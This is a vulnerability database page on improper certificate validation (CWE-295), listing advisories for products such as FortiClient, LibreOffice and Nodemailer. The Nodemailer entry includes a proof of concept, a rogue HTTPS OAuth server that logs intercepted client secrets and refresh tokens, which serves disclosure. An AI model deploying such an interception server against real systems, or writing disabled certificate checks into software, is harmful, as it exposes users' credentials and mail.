Common Weakness Enumeration

CWE-295

Allowed

Improper Certificate Validation

Abstraction: Base · Status: Draft

The product does not validate, or incorrectly validates, a certificate.

1907 vulnerabilities reference this CWE, most recent first.

GHSA-R62W-V23R-PQCM

Vulnerability from github – Published: 2025-06-06 18:30 – Updated: 2025-09-17 21:30
VLAI
Details

An improper certificate validation vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to compromise the security of the system.

We have already fixed the vulnerability in the following version: File Station 5 5.5.6.4847 and later

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-30279"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-06T16:15:26Z",
    "severity": "HIGH"
  },
  "details": "An improper certificate validation vulnerability has been reported to affect File Station 5. If a remote  attacker gains a user account, they can then exploit the vulnerability to compromise the security of the system.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.4847 and later",
  "id": "GHSA-r62w-v23r-pqcm",
  "modified": "2025-09-17T21:30:40Z",
  "published": "2025-06-06T18:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30279"
    },
    {
      "type": "WEB",
      "url": "https://www.qnap.com/en/security-advisory/qsa-25-16"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-R657-X7W7-Q6J3

Vulnerability from github – Published: 2024-09-10 15:31 – Updated: 2024-09-26 15:30
VLAI
Details

An improper certificate validation vulnerability [CWE-295] in FortiClientWindows 6.4 all versions, 7.0.0 through 7.0.7, FortiClientMac 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientLinux 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientAndroid 6.4 all versions, 7.0 all versions, 7.2.0 and FortiClientiOS 5.6 all versions, 6.0.0 through 6.0.1, 7.0.0 through 7.0.6 SAML SSO feature may allow an unauthenticated attacker to man-in-the-middle the communication between the FortiClient and  both the service provider and the identity provider.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-45856"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-10T15:15:13Z",
    "severity": "MODERATE"
  },
  "details": "An improper certificate validation vulnerability [CWE-295] in FortiClientWindows 6.4 all versions, 7.0.0 through 7.0.7, FortiClientMac 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientLinux 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientAndroid 6.4 all versions, 7.0 all versions, 7.2.0 and FortiClientiOS 5.6 all versions, 6.0.0 through 6.0.1, 7.0.0 through 7.0.6 SAML SSO feature may allow an unauthenticated attacker to\u00a0man-in-the-middle the communication between the FortiClient and\u00a0 both the service provider and the identity provider.",
  "id": "GHSA-r657-x7w7-q6j3",
  "modified": "2024-09-26T15:30:33Z",
  "published": "2024-09-10T15:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45856"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.fortinet.com/psirt/FG-IR-22-230"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R6P3-G585-326C

Vulnerability from github – Published: 2022-05-17 02:39 – Updated: 2025-04-20 03:39
VLAI
Details

The avb-bank-mobile-banking/id592565443 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-9567"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-06-16T12:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The avb-bank-mobile-banking/id592565443 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.",
  "id": "GHSA-r6p3-g585-326c",
  "modified": "2025-04-20T03:39:12Z",
  "published": "2022-05-17T02:39:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9567"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/%40chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R6QH-J42J-PW64

Vulnerability from github – Published: 2024-07-31 21:32 – Updated: 2024-08-06 21:57
VLAI
Summary
Beego privilege escalation vulnerability
Details

An issue in beego v.2.2.0 and before allows a remote attacker to escalate privileges via the sendMail function located in the beego/core/logs/smtp.go file.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/beego/beego/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-40464"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295",
      "CWE-599"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-01T13:34:50Z",
    "nvd_published_at": "2024-07-31T21:15:17Z",
    "severity": "HIGH"
  },
  "details": "An issue in beego v.2.2.0 and before allows a remote attacker to escalate privileges via the `sendMail` function located in the `beego/core/logs/smtp.go` file.",
  "id": "GHSA-r6qh-j42j-pw64",
  "modified": "2024-08-06T21:57:12Z",
  "published": "2024-07-31T21:32:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/beego/beego/security/advisories/GHSA-6g9p-wv47-4fxq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40464"
    },
    {
      "type": "WEB",
      "url": "https://github.com/beego/beego/commit/8f89e12e6cafb106d5c201dbc3b2a338bfde74e2"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/nyxfqq/b53b0148b9aa040de63f58a68fd11445"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/beego/beego"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Beego privilege escalation vulnerability"
}

GHSA-R73F-2RXH-PRFM

Vulnerability from github – Published: 2025-03-21 15:31 – Updated: 2025-12-10 21:31
VLAI
Details

An Improper Certificate Validation vulnerability in LibreOffice allowed an attacker to self sign an ODF document, with a signature untrusted by the target, then modify it to change the signature algorithm to an invalid (or unknown to LibreOffice) algorithm and LibreOffice would incorrectly present such a signature with an unknown algorithm as a valid signature issued by a trusted person

This issue affects LibreOffice: from 7.0 before 7.0.5, from 7.1 before 7.1.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25635"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-21T15:15:35Z",
    "severity": "MODERATE"
  },
  "details": "An Improper Certificate Validation vulnerability in LibreOffice allowed \nan attacker to self sign an ODF document, with a signature untrusted by \nthe target, then modify it to change the signature algorithm to an \ninvalid (or unknown to LibreOffice) algorithm and LibreOffice would incorrectly present such a signature with an unknown algorithm as a \nvalid signature issued by a trusted person\n\n\nThis issue affects LibreOffice: from 7.0 before 7.0.5, from 7.1 before 7.1.1.",
  "id": "GHSA-r73f-2rxh-prfm",
  "modified": "2025-12-10T21:31:28Z",
  "published": "2025-03-21T15:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25635"
    },
    {
      "type": "WEB",
      "url": "https://www.libreoffice.org/about-us/security/advisories/cve-2021-25635"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-R79F-WXVR-PQ9R

Vulnerability from github – Published: 2022-02-11 00:00 – Updated: 2022-03-17 00:05
VLAI
Details

A CWE-295: Improper Certificate Validation vulnerability exists that could allow a Man-in-theMiddle attack when communications between the client and Geo SCADA database server are intercepted. Affected Product: ClearSCADA (All Versions), EcoStruxure Geo SCADA Expert 2019 (All Versions), EcoStruxure Geo SCADA Expert 2020 (All Versions)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-24320"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-09T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A CWE-295: Improper Certificate Validation vulnerability exists that could allow a Man-in-theMiddle attack when communications between the client and Geo SCADA database server are intercepted. Affected Product: ClearSCADA (All Versions), EcoStruxure Geo SCADA Expert 2019 (All Versions), EcoStruxure Geo SCADA Expert 2020 (All Versions)",
  "id": "GHSA-r79f-wxvr-pq9r",
  "modified": "2022-03-17T00:05:45Z",
  "published": "2022-02-11T00:00:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24320"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-039-05"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0019/MNDT-2022-0019.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R7G4-QG5F-QQM2

Vulnerability from github – Published: 2026-06-15 17:34 – Updated: 2026-06-15 17:34
VLAI
Summary
Nodemailer: Improper TLS Certificate Validation in OAuth2 Token Fetch Enables Credential Interception
Details

Summary

Nodemailer disables TLS certificate verification in its internal HTTPS fetch client through the use of rejectUnauthorized: false inside lib/fetch/index.js.

As a result, OAuth2 token requests trust invalid or self-signed HTTPS certificates and transmit sensitive OAuth credentials over connections that should fail TLS validation.

An attacker in a machine-in-the-middle position can intercept OAuth2 credential exchanges and capture:

  • OAuth client_secret
  • refresh_token
  • access tokens

The issue was verified through runtime testing using a self-signed HTTPS OAuth endpoint.

Details

Root Cause

The issue originates from the internal HTTPS fetch implementation used by Nodemailer for OAuth2 token retrieval and related outbound HTTPS requests.

Inside:

lib/fetch/index.js

the request options contain:

rejectUnauthorized: false

This disables TLS peer certificate verification globally for the internal HTTPS client unless explicitly overridden through optional TLS configuration.

As a result:

  • self-signed certificates are trusted
  • invalid CA chains are accepted
  • hostname validation is bypassed
  • attacker-controlled HTTPS endpoints are treated as trusted

This violates expected HTTPS security guarantees.

Vulnerable Flow

The vulnerable execution chain is:

OAuth2 Transport ↓ XOAuth2 token generation ↓ Internal HTTPS fetch client ↓ HTTPS request with rejectUnauthorized:false ↓ Attacker-controlled/self-signed endpoint trusted ↓ OAuth credentials transmitted

PoC

Environment

Mail API (app/server.js)

const express = require("express");
const nodemailer = require("nodemailer");
require("dotenv").config();

const app = express();

app.use(express.json());

const transporter = nodemailer.createTransport({
    host: process.env.SMTP_HOST,
    port: process.env.SMTP_PORT,
    secure: false,
    auth: {
        user: process.env.SMTP_USER,
        pass: process.env.SMTP_PASS
    }
});

app.post("/send", async (req, res) => {
    try {
        const { to, subject, text, html } = req.body;

        const info = await transporter.sendMail({
            from: `"Mailer" <${process.env.SMTP_USER}>`,
            to,
            subject,
            text,
            html
        });

        res.json({
            success: true,
            messageId: info.messageId
        });

    } catch (err) {
        console.error(err);
        res.status(500).json({
            success: false,
            error: err.message
        });
    }
});

app.listen(process.env.PORT, () => {
    console.log(`Mailer running on port ${process.env.PORT}`);
});

Malicious HTTPS OAuth Server (poc/evil-oauth.js)

const https = require('https');
const fs = require('fs');

https.createServer({
    key: fs.readFileSync('./key.pem'),
    cert: fs.readFileSync('./cert.pem')
}, (req, res) => {

    console.log('\n==== REQUEST INTERCEPTED ====');
    console.log(req.method, req.url);

    let body = '';

    req.on('data', chunk => {
        body += chunk;
    });

    req.on('end', () => {

        console.log('\nPOST BODY:');
        console.log(body);

        res.writeHead(200, {
            'Content-Type': 'application/json'
        });

        res.end(JSON.stringify({
            access_token: 'attacker_token',
            expires_in: 3600
        }));
    });

}).listen(8443, () => {
    console.log('Malicious HTTPS OAuth server listening on 8443');
});

Nodemailer OAuth2 Test (test.js)

const nodemailer = require('./');

const transporter = nodemailer.createTransport({
    service: 'gmail',

    auth: {
        type: 'OAuth2',

        user: 'redacted@example.com',

        clientId: 'CLIENT_ID_REDACTED',
        clientSecret: 'CLIENT_SECRET_REDACTED',

        refreshToken: 'REFRESH_TOKEN_REDACTED',

        accessUrl: 'https://localhost:8443/token'
    }
});

transporter.sendMail({
    from: 'redacted@example.com',
    to: 'redacted@example.com',
    subject: 'PoC',
    text: 'test'

}, (err, info) => {

    console.log('\n==== NODEMAILER RESULT ====');

    if (err) {
        console.error(err);
    } else {
        console.log(info);
    }
});

Steps to Reproduce

  • Start malicious HTTPS OAuth server:
  • node poc/evil-oauth.js
  • Run Nodemailer OAuth2 test:
  • node test.js
  • Observe intercepted OAuth2 request body on the malicious HTTPS server.

PIC image

Impact

  • OAuth credential theft
  • unauthorized email access
  • persistent token abuse
  • unauthorized mail sending
  • mailbox compromise
  • interception/tampering of OAuth responses

The issue effectively downgrades HTTPS security protections for sensitive OAuth credential exchanges.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 8.0.7"
      },
      "package": {
        "ecosystem": "npm",
        "name": "nodemailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-15T17:34:48Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nNodemailer disables TLS certificate verification in its internal HTTPS fetch client through the use of rejectUnauthorized: false inside lib/fetch/index.js.\n\nAs a result, OAuth2 token requests trust invalid or self-signed HTTPS certificates and transmit sensitive OAuth credentials over connections that should fail TLS validation.\n\nAn attacker in a machine-in-the-middle position can intercept OAuth2 credential exchanges and capture:\n\n- OAuth client_secret\n- refresh_token\n- access tokens\n\nThe issue was verified through runtime testing using a self-signed HTTPS OAuth endpoint.\n\n### Details\nRoot Cause\n\nThe issue originates from the internal HTTPS fetch implementation used by Nodemailer for OAuth2 token retrieval and related outbound HTTPS requests.\n\nInside:\n\n`lib/fetch/index.js`\n\nthe request options contain:\n\n`rejectUnauthorized: false`\n\nThis disables TLS peer certificate verification globally for the internal HTTPS client unless explicitly overridden through optional TLS configuration.\n\nAs a result:\n\n- self-signed certificates are trusted\n- invalid CA chains are accepted\n- hostname validation is bypassed\n- attacker-controlled HTTPS endpoints are treated as trusted\n\nThis violates expected HTTPS security guarantees.\n\n**Vulnerable Flow**\n\nThe vulnerable execution chain is:\n\nOAuth2 Transport\n        \u2193\nXOAuth2 token generation\n        \u2193\nInternal HTTPS fetch client\n        \u2193\nHTTPS request with rejectUnauthorized:false\n        \u2193\nAttacker-controlled/self-signed endpoint trusted\n        \u2193\nOAuth credentials **transmitted**\n\n\n### PoC\n**Environment**\n#### Mail API (app/server.js)\n```\nconst express = require(\"express\");\nconst nodemailer = require(\"nodemailer\");\nrequire(\"dotenv\").config();\n\nconst app = express();\n\napp.use(express.json());\n\nconst transporter = nodemailer.createTransport({\n    host: process.env.SMTP_HOST,\n    port: process.env.SMTP_PORT,\n    secure: false,\n    auth: {\n        user: process.env.SMTP_USER,\n        pass: process.env.SMTP_PASS\n    }\n});\n\napp.post(\"/send\", async (req, res) =\u003e {\n    try {\n        const { to, subject, text, html } = req.body;\n\n        const info = await transporter.sendMail({\n            from: `\"Mailer\" \u003c${process.env.SMTP_USER}\u003e`,\n            to,\n            subject,\n            text,\n            html\n        });\n\n        res.json({\n            success: true,\n            messageId: info.messageId\n        });\n\n    } catch (err) {\n        console.error(err);\n        res.status(500).json({\n            success: false,\n            error: err.message\n        });\n    }\n});\n\napp.listen(process.env.PORT, () =\u003e {\n    console.log(`Mailer running on port ${process.env.PORT}`);\n});\n```\n\n#### Malicious HTTPS OAuth Server (poc/evil-oauth.js)\n\n```\nconst https = require(\u0027https\u0027);\nconst fs = require(\u0027fs\u0027);\n\nhttps.createServer({\n    key: fs.readFileSync(\u0027./key.pem\u0027),\n    cert: fs.readFileSync(\u0027./cert.pem\u0027)\n}, (req, res) =\u003e {\n\n    console.log(\u0027\\n==== REQUEST INTERCEPTED ====\u0027);\n    console.log(req.method, req.url);\n\n    let body = \u0027\u0027;\n\n    req.on(\u0027data\u0027, chunk =\u003e {\n        body += chunk;\n    });\n\n    req.on(\u0027end\u0027, () =\u003e {\n\n        console.log(\u0027\\nPOST BODY:\u0027);\n        console.log(body);\n\n        res.writeHead(200, {\n            \u0027Content-Type\u0027: \u0027application/json\u0027\n        });\n\n        res.end(JSON.stringify({\n            access_token: \u0027attacker_token\u0027,\n            expires_in: 3600\n        }));\n    });\n\n}).listen(8443, () =\u003e {\n    console.log(\u0027Malicious HTTPS OAuth server listening on 8443\u0027);\n});\n```\n\n#### Nodemailer OAuth2 Test (test.js)\n\n```\nconst nodemailer = require(\u0027./\u0027);\n\nconst transporter = nodemailer.createTransport({\n    service: \u0027gmail\u0027,\n\n    auth: {\n        type: \u0027OAuth2\u0027,\n\n        user: \u0027redacted@example.com\u0027,\n\n        clientId: \u0027CLIENT_ID_REDACTED\u0027,\n        clientSecret: \u0027CLIENT_SECRET_REDACTED\u0027,\n\n        refreshToken: \u0027REFRESH_TOKEN_REDACTED\u0027,\n\n        accessUrl: \u0027https://localhost:8443/token\u0027\n    }\n});\n\ntransporter.sendMail({\n    from: \u0027redacted@example.com\u0027,\n    to: \u0027redacted@example.com\u0027,\n    subject: \u0027PoC\u0027,\n    text: \u0027test\u0027\n\n}, (err, info) =\u003e {\n\n    console.log(\u0027\\n==== NODEMAILER RESULT ====\u0027);\n\n    if (err) {\n        console.error(err);\n    } else {\n        console.log(info);\n    }\n});\n```\n**Steps to Reproduce**\n\n- Start malicious HTTPS OAuth server:\n- node poc/evil-oauth.js\n- Run Nodemailer OAuth2 test:\n- node test.js\n- Observe intercepted OAuth2 request body on the malicious HTTPS server.\n\n**PIC**\n\u003cimg width=\"1919\" height=\"1029\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fdeafeb4-c0c5-49f8-beeb-e7f945be0516\" /\u003e\n\n### Impact\n\n- OAuth credential theft\n- unauthorized email access\n- persistent token abuse\n- unauthorized mail sending\n- mailbox compromise\n- interception/tampering of OAuth responses\n\nThe issue effectively downgrades HTTPS security protections for sensitive OAuth credential exchanges.",
  "id": "GHSA-r7g4-qg5f-qqm2",
  "modified": "2026-06-15T17:34:48Z",
  "published": "2026-06-15T17:34:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-r7g4-qg5f-qqm2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodemailer/nodemailer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Nodemailer: Improper TLS Certificate Validation in OAuth2 Token Fetch Enables Credential Interception"
}

GHSA-R7H7-HC5W-P3VW

Vulnerability from github – Published: 2022-05-17 02:39 – Updated: 2025-04-20 03:39
VLAI
Details

The mount-vernon-bank-trust-mobile-banking/id542706679 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-9570"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-06-16T12:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The mount-vernon-bank-trust-mobile-banking/id542706679 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.",
  "id": "GHSA-r7h7-hc5w-p3vw",
  "modified": "2025-04-20T03:39:12Z",
  "published": "2022-05-17T02:39:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9570"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/%40chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R872-MGGQ-8GFH

Vulnerability from github – Published: 2022-05-14 03:23 – Updated: 2022-05-14 03:23
VLAI
Details

Botan 2.2.0 - 2.4.0 (fixed in 2.5.0) improperly handled wildcard certificates and could accept certain certificates as valid for hostnames when, under RFC 6125 rules, they should not match. This only affects certificates issued to the same domain as the host, so to impersonate a host one must already have a wildcard certificate matching other hosts in the same domain. For example, b*.example.com would match some hostnames that do not begin with a 'b' character.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-9127"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-04-02T17:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Botan 2.2.0 - 2.4.0 (fixed in 2.5.0) improperly handled wildcard certificates and could accept certain certificates as valid for hostnames when, under RFC 6125 rules, they should not match. This only affects certificates issued to the same domain as the host, so to impersonate a host one must already have a wildcard certificate matching other hosts in the same domain. For example, b*.example.com would match some hostnames that do not begin with a \u0027b\u0027 character.",
  "id": "GHSA-r872-mggq-8gfh",
  "modified": "2022-05-14T03:23:44Z",
  "published": "2022-05-14T03:23:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9127"
    },
    {
      "type": "WEB",
      "url": "https://botan.randombit.net/security.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R8F7-9PFQ-MJMV

Vulnerability from github – Published: 2022-02-09 22:22 – Updated: 2023-04-21 19:18
VLAI
Summary
Improper Certificate Validation in node-sass
Details

Certificate validation in node-sass 2.0.0 to 6.0.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "node-sass"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-24025"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-06T22:18:40Z",
    "nvd_published_at": "2021-01-11T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Certificate validation in node-sass 2.0.0 to 6.0.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.",
  "id": "GHSA-r8f7-9pfq-mjmv",
  "modified": "2023-04-21T19:18:26Z",
  "published": "2022-02-09T22:22:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24025"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sass/node-sass/issues/3067"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sass/node-sass/pull/3149"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sass/node-sass/pull/567#issuecomment-656609236"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sass/node-sass/commit/0a21792803639851b480fbd8cbcb5540ef974387"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sass/node-sass"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sass/node-sass/releases/tag/v7.0.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Certificate Validation in node-sass"
}

Mitigation
Architecture and Design Implementation

Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner's public key.

Mitigation
Implementation

If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname.

CAPEC-459: Creating a Rogue Certification Authority Certificate

An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.

CAPEC-475: Signature Spoofing by Improper Validation

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.